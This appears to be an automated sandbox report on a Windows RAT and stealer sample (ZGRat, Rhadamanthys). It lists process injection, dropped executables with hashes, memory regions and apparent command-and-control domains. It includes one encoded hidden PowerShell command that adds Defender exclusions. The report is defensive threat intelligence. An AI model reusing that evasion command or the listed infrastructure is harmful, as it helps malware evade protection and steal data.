Malware Analysis Report

2025-06-15 19:48

Sample ID 240212-j1yv1aad26
Target 96af9bc7db122e2486c0c1f1b90faacc
SHA256 1b9339d0a70cdef37f4827a81100f9e8158a5633dc8b7a2c3b616f070ce49b5d
Tags
upx zgrat rat rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1b9339d0a70cdef37f4827a81100f9e8158a5633dc8b7a2c3b616f070ce49b5d

Threat Level: Known bad

The file 96af9bc7db122e2486c0c1f1b90faacc was found to be: Known bad.

Malicious Activity Summary

upx zgrat rat rhadamanthys stealer

Detect ZGRat V1

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

ZGRat

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

UPX packed file

Suspicious use of SetThreadContext

Drops file in System32 directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-12 08:08

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-12 08:08

Reported

2024-02-12 08:11

Platform

win7-20231215-en

Max time kernel

128s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2476 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 2476 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 2476 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 2476 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 2476 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 2220 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2220 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2220 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2220 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2220 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2220 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2220 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2220 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2808 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2808 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2808 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2808 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1828 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\WerFault.exe
PID 1828 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\WerFault.exe
PID 1828 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\WerFault.exe
PID 1828 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\WerFault.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2696 wrote to memory of 3016 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2696 wrote to memory of 3016 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2696 wrote to memory of 3016 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 124

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {28965341-BA25-4A85-9653-A38C99C1CD7A} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:S4U:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Network

Country Destination Domain Proto
US 8.8.8.8:53 hubvera.ac.ug udp
RU 91.215.85.223:80 hubvera.ac.ug tcp
US 8.8.8.8:53 ddlakava.ac.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 rebrand.ly udp
US 15.197.137.111:80 rebrand.ly tcp
US 8.8.8.8:53 fran.ac.ug udp
US 8.8.8.8:53 fransceysse.ac.ug udp
US 8.8.8.8:53 tinyurl.com udp
US 104.20.138.65:80 tinyurl.com tcp
US 8.8.8.8:53 kode.ac.ug udp
US 8.8.8.8:53 kodekode.ac.ug udp
US 8.8.8.8:53 tuekisa.ac.ug udp
US 8.8.8.8:53 partadino.ac.ug udp
RU 91.215.85.223:80 partadino.ac.ug tcp
US 8.8.8.8:53 markinda.top udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 movescx.top udp
US 8.8.8.8:53 cointra.ac.ug udp
US 8.8.8.8:53 muylove.ac.ug udp
US 8.8.8.8:53 partiad.top udp
US 8.8.8.8:53 partiad.xyz udp
US 8.8.8.8:53 udp

Files

memory/2476-0-0x0000000000400000-0x0000000000427000-memory.dmp

memory/2476-3-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2220-4-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2476-5-0x0000000000240000-0x0000000000248000-memory.dmp

memory/2220-8-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2476-9-0x0000000000400000-0x0000000000427000-memory.dmp

memory/2220-13-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2476-7-0x0000000000270000-0x0000000000297000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9d8f024c162815eca1f4cfad352ab507
SHA1 14c45c70f00bd02e0680d6183142608c14941124
SHA256 bc70994ab3a1b3308eeb8af57f6f62f6c8556d79ea0517336558f2da188ea14c
SHA512 0383394d8b832d0a28126c6689f93e08f2b2897e63dec9688fb857a2aedbc10b42c46506aac78925a257706a4bd10126c075912779e86cc4a165f871f4b251ea

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 d398906e371437d8cb36e820f9ee9fdc
SHA1 1ee21e725345d9e70d38ea0b2c96a7558c36d161
SHA256 4ed07c2a39e19e53b2e85db609bd23e24bcb21a033ccf03d06315e00e4ad433b
SHA512 986a90cea2ea868daf97dccd0a36841aa501a4cd02d46e556795b1faabb0aa825bf059bee1ddf5aeadfe9c1a605567604ff5f20e7fadd01a4c2ce8ca376e0e5d

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 a5233ad11d01b0684a4a742aea931a6b
SHA1 a738c48b5cdd62ab0f80780e52d93718bfadf52c
SHA256 7ac299c93a19a90c352a9112bc5f30e71d9a77929caf0eff903a1ded3d2cd027
SHA512 6dbe1583b355cbc17dbb942cec5fa65b1e353961aa6f5e2c19fcc0aa746d1730da9ea9b4c9253e25a5e2ed37a9ead31e7096ce32a35cd83f27b142533f8fd025

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 2fed29c76f2a11ec7ae738d030db1d79
SHA1 52fde76e90d950f4739f968dd406b2fb257cc97f
SHA256 6187097a8ad07528c885ee4df96a80848d4b59f2d0024b2527ebe7f9541e318f
SHA512 34d6ffc0f6db7906b2cad082f8afdefaf350c6686543b4bc21d4f57ec2b4e54b86746d4fdf70d52f7f6230cc4055e4e2b11c4fb208f27a4edba62b8319b4f231

memory/2808-25-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/2808-24-0x00000000008D0000-0x0000000000AF8000-memory.dmp

memory/2808-26-0x00000000048A0000-0x0000000004AA8000-memory.dmp

memory/2808-27-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-28-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-32-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-34-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-30-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-36-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-38-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-40-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-42-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-48-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-50-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-46-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-44-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-52-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-56-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-60-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-58-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-54-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2220-62-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2220-64-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2808-65-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/2220-66-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2220-69-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2808-70-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-74-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-78-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-82-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-88-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-86-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-84-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-80-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-76-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-72-0x00000000048A0000-0x0000000004AA3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 84b7642e84d945060d870593b255ffe7
SHA1 598e57f7628c4bdd4d55af95c9e17e82e1161edf
SHA256 2d3b8471b5d04701fe00d925c0c0b52d1d2b0d77a7b8886a133aab849b9f30b2
SHA512 58c8dccdf4e75ba5aa1cacde224ebd688a86b33761e03eb0886f15c97d49e92516717e691ef7754709e170d474eb6c7903ca99522b0ba83ee31e9b8116bc991e

memory/2288-465-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/2288-463-0x0000000000DD0000-0x0000000000FF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 50ef7597e47f97e2e6dc1463536fb047
SHA1 1b4e4e086e71d98b80080f34d2cc97e7f029c74c
SHA256 c8225e680b373b27fd79aad0dfc907f08b1eea6fa4f6b12f1ed8164d534e84dc
SHA512 d7acf69c40753d466ceccd4afdb141d69a1b5a6f5c21596990220c756f4f23402c80a4f824706c025a249575b0ccbdea69a127c05e38e9510521c4f090ea3983

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 55a46b19cb826582900c42e24e39d737
SHA1 209794e5247c876d56aab1157d7061bee43b4e62
SHA256 ac0867d88f3b648a4121814e12cc711600e7da77bbff3df266f067e968fb81f1
SHA512 bf5401e62fa143a0f0bad1c63bda3061aade4cd57f8d2d4c2ddd36fce7d441cab3c8245c07501ffc687a5435013f58572b3fd83ede01a3b00961edeab82c0e15

memory/2808-1555-0x0000000002100000-0x0000000002140000-memory.dmp

memory/2808-1567-0x00000000003D0000-0x00000000003D1000-memory.dmp

memory/2808-1870-0x0000000005660000-0x0000000005800000-memory.dmp

memory/2808-1872-0x0000000004E50000-0x0000000004E9C000-memory.dmp

memory/2288-1919-0x0000000004BD0000-0x0000000004C10000-memory.dmp

memory/2288-1920-0x0000000000370000-0x0000000000371000-memory.dmp

memory/2288-1922-0x0000000073A80000-0x000000007416E000-memory.dmp

\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 443da3a41ece40b2043787032eeccfcf
SHA1 8a414bd758e3e50de70ee9fad39ab124a43e279b
SHA256 6c2be637d7af76d6d0380c2661aab3796e972d52d5b44726d2db7f57181deda0
SHA512 fdf8a2e8ca6ca43c01bc36d96bb565a3a4d0bbeb875f962d091e5ffeb23bed04e26442b1873967e19eb023d7140e3ffd19d1716ab2bf1a0f4f5ddbb0c056c06e

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 d6d5eae5855383e77c67f6f9b7df8dd7
SHA1 0947f88221d255f76517f360d2459c29d700ecb6
SHA256 4be4fcd651fb28a4c1b7fd4161221ce2a7e74f5e8ad437d2692e578f90c2be35
SHA512 c80eb22ec344cee40d916fd3f05e03c26c912ba362b52c2f28875a83cf07fbef30b64d91a9d594e18ecb6a858e46f2d17b1792f86b5d2cc0f905705f81edfb5f

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 de9bca236cb10c833c24c6591c54d07c
SHA1 8201dbcbd020df3c26991fc55e9c3013df0b44e8
SHA256 26f41925dadd66eb00bb3ffede516f82c5b863508e0cac8e2cc2c2b3bd7fbd56
SHA512 eca9663434e44c49b3ee292c53f2ff781b41e6b9a2d044fa2dae8955d9374376bc7542c98c6f6ddbc2f4232300c66855a7d2e31c7b0c69c31255823e507c09ab

memory/816-1930-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/816-1929-0x0000000001030000-0x0000000001170000-memory.dmp

memory/816-1931-0x0000000004920000-0x0000000004960000-memory.dmp

memory/816-1932-0x0000000004C40000-0x0000000004D68000-memory.dmp

memory/816-1933-0x0000000004D70000-0x0000000004E9A000-memory.dmp

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 51919b0ef17774e9c777ee725da6c4d3
SHA1 f9b8449253b99a4990772c0d4eb73f7a661918f5
SHA256 89e5c64c44b2d2bb3a78e8a012ca218051a786178c5872cc94b0b2b49ca140f0
SHA512 f9b9614a6809163ff5f399ca8f8cc3be034778f45a1cdbf87ef6b72f9f9dde5861d809a544d27e5cefe94777e9e96890eee4c703e1e3de32e6c6a0c365a058be

memory/2808-1958-0x0000000073A80000-0x000000007416E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 bd6c337c701f84ad10090c91c5898e90
SHA1 0b34cffbb4e4989bd212bfb6893618c7615663da
SHA256 1928e319e10faefcda78ac6fbf7e718c3c763deb0a8c4698e30a16408a0e3a35
SHA512 334fd09c8a00d88b1a4ea8297425a22ed9dc11647b6f2dad391a53736fa866a17280f7085b92b0d612fbaad24508eb2e0da2591c4dd9791e3c01f105f6c67e3a

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9f74bec46233e8ffc6b03ca635f3a2a8
SHA1 fd8d4598b2e31cb989301d2f67a7689c45b8dd9b
SHA256 290f4f88a43b4e9e23df7dab7eaca150273a0527a85d1a61281c74eb8aa67ca8
SHA512 5e5b2ac7422600f3da361cf8a94d134603c82a689b066879a3cce6c5c94bc56b8bc28cac00009be08d929a7ec5aa6cb0f590fe6a4745da13995cc0c860238aae

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 b60184f40ddf5ec7fc61c65b62fc9141
SHA1 682bf3d0b76218ff2cdc19e098047cb1c42fd621
SHA256 0b7f3500478e07064030f7e1a6f07f0693a9de02bf087dc16e88406ae68e874a
SHA512 536a6570b0388750d77276603d666e271bf89e92d8cc469f6d82b0c4e6c182cca1efbb1ea32fccbc9009c5810858c333663ca6d11d04fe4d3ebd820def8a6f4e

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9aa45e5cc7338a6ee96a9499f29bc203
SHA1 17e924683892829ad9892dd41c49361910ce76b6
SHA256 4a958b0ea4334ade568948d58c6af091c4b669fc0012680abc823dd7050f4ea9
SHA512 bce3105732d37cdda999a96442e6a398011de3317a931b55a5f55e4f9eb5b306ab217e26378934a10d8ddbab61880bb1d3d948cc29c20c154274b3507485e1a9

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 264aec5e8f163adefa07e0b41ec0c2d5
SHA1 ac4ae6815056b5acd081722899e64920256b2ad0
SHA256 681280e76f70d866d12a9ff187527f18ec1b2d4d85e12ff83c432726b9c4742c
SHA512 5f4688c9305c6a4cbd4cb8693a8b489f4f6ea0364cee83e3f2070929f6b437cc0ba752c6eb60643d8692253439e11d02acd14760505496d4d973b87c7d66fcdc

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 84df7195deebf80a244bcef74605b0da
SHA1 90873f5500dc9cf95f9c6f053dc7ca6295ee4b08
SHA256 48880f0748870a2dc80fe97359d0151f85f19c15bc6a4560bd4bc9ea282099cb
SHA512 3913e970d25601be815fde2505d28dd6a28d3ad21d18852460a2a3bfd57e1c7f143a2b7a352db72f035df1db8ea666ed5cfbb78f899dcba125f79b9b4381c17e

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 92bfda8e08553d58db843e802d9fc7d1
SHA1 42249be3674af7880596fa8b3df3d5f7f49bf899
SHA256 1532f0669c6ad020abf12e0931c96a22a81a97fe16458f74662a26ca6afebc54
SHA512 ae46050f0d653a8181908ea736db3276049c9d4e665d197cff10fb58867568bdf8638e06d93075b1bb76548dbf631f7262243e2d564036f2dcec4cfa0bb1c16d

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 325e180dece8f34a28e7429d3caa0c56
SHA1 2925a8d2e51c6423ae9b564bbeccce48708a5452
SHA256 509f32082c57fb92bc153d63fe6003c9e7219368c71fba6c66ecea1bc7d7570c
SHA512 391d00c9149d1f1c6d9f625833e52b21222834d3b982197f28d9019911042dbb52ddf17b440c9c73bd7868e57c894f339f7d5dacf3ee9458d2ef49079a9de5e2

memory/816-2890-0x0000000000430000-0x0000000000431000-memory.dmp

memory/816-2891-0x0000000004840000-0x0000000004900000-memory.dmp

\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 4071afad62bc8c7141c15894b435ba1e
SHA1 19ee80188d6a57a1ebb8107c4d54e3e3896b5f95
SHA256 92b1cd92991780c9716e8aa50a2189853ab3a7518125d93a04268a5820adaba1
SHA512 beed7807f244a355a46e590f6e964f643192b3b4950cef84fa9c53d51b01d243505ea7e17db5d993fff99899c3dcefafc02ce8dc1ba1a8bd4590524b21d5f7a5

memory/816-2906-0x0000000073A80000-0x000000007416E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 b16246fcde6fde7f4ba6ceb8e6a3f146
SHA1 fe006657d27ddc87cf9b19985693b9949f0f6503
SHA256 891b9a420c7a69716c80150fde1dbb4a737cb32843074ba024ca72b18e538c7d
SHA512 1871c78d027d93b3cefd572fae1acc0a41ce818f5038b4270cc6deed4ffceebf2c246f12c643f0f87287e100e60d3dea0d12c32c3fd98fe12fdc4a2e79cd23bd

memory/1976-2910-0x0000000000400000-0x000000000049C000-memory.dmp

memory/1976-2912-0x0000000004920000-0x0000000004A08000-memory.dmp

memory/1976-2913-0x00000000048E0000-0x0000000004920000-memory.dmp

memory/1976-2911-0x0000000073A00000-0x00000000740EE000-memory.dmp

memory/1976-5115-0x00000000005D0000-0x0000000000626000-memory.dmp

memory/2220-5119-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1976-5120-0x0000000000D70000-0x0000000000DC4000-memory.dmp

C:\Users\Admin\AppData\Local\TypeId\xutqjisn\AttributeString.exe

MD5 71eb1bc6e6da380c1cb552d78b391b2a
SHA1 df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d
SHA256 cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6
SHA512 d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

memory/1976-5122-0x0000000073A00000-0x00000000740EE000-memory.dmp

memory/3016-5127-0x0000000019DE0000-0x000000001A0C2000-memory.dmp

